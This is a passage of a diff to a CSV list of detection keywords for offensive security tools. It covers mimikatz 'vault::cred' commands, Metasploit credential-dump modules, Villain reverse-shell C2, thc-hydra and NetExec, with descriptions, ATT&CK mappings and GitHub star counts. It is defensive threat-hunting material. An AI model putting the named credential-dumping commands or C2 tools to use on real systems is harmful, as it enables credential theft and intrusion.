your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1342","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z" +"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*valid_user@contoso.com:Password1*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vanhauser-thc/thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*vault::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vault::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*vault::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*vba-macro-mac-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*VBA-RunPE -*","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","189","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z" "*vba-windows-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*vbs-obfuscator.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*VbulletinWidgetTemplateRce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*vcsmap*","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","131","25","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z" -"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*vectra-ai-research/MAAD-AF*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*veeam_dump_mssql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*veeam_dump_postgresql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Vegile -*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" -"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*Verified Merlin server *","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*verovaleros/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*VID_03EB&PID_2403 *","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z" "*VID_0483&PID_5740*","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A" "*viewdns-get-rootdomains-ip-ns *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*viewdns-get-rootdomains-whois *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*viper/*.sock*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*viper-dev.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*viperpython-dev*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -18062,76 +18248,76 @@ "*viperzip.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*virajkulkarni14*","offensive_tool_keyword","Github Username","github repo username hosting exploitation 